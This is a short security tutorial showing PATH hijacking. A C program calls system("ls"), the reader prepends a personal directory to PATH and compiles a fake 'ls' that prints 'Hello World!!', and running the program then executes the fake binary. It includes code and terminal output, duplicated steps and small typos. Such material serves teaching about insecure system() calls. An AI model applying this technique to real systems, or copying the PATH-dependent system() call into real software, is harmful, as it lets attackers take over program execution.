Unix/Linux/Windows systems uses PATH variable to look up the standard bin files of the inbuilt command in the Shell...This PATH variable can be changed and thus we can change the flow of a program using system() call...How? This we'll be seeing in this tutorial..
We'll be using a basic C Program for demonstarting our article..
system.c
Compiling
Running
lets echo the PATH variable and know what it contains
This means that the each command we enter into the shell is searched in the above PATH's..
So lets change it and add our own path at the beginning..
We added $HOME/article at the beginning of the path variable...
Now lets add a program named 'ls' in the $HOME/articles directory...
ls.c
Compiling
Now that we have a file named 'ls' and the PATH variable Changed. So , now we are ready to exploit the system.c program...
Lets run it now...
Yupi!!!We did it again...We just exploited the system.c program to change its normal Program Flow..
Method
We'll be using a basic C Program for demonstarting our article..
system.c
Code:
#include<stdio.h>
int main()
{
system("ls");
return(0);
}
Code:
gcc system.c -o system
Code:
aneesh@aneesh-laptop:~/articles/C$ ./.system buggyProgram format getSrc stack2 stack.c system.c test buggyProgram.c format.c stack stack2.c system system.x test.c
Code:
aneesh@aneesh-laptop:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
So lets change it and add our own path at the beginning..
Code:
aneesh@aneesh-laptop:~$ PATH=$HOME/articles:$PATH
Now lets add a program named 'ls' in the $HOME/articles directory...
Code:
aneesh@aneesh-laptop:~$ cd $HOME/articles
Code:
#include<stdio.h>
int main()
{
printf("Hello World!!\n");
return(0);
}
Code:
gcc ls.c -o ls
Lets run it now...
Code:
aneesh@aneesh-laptop:~/articles/C$ ./system Hello World!!
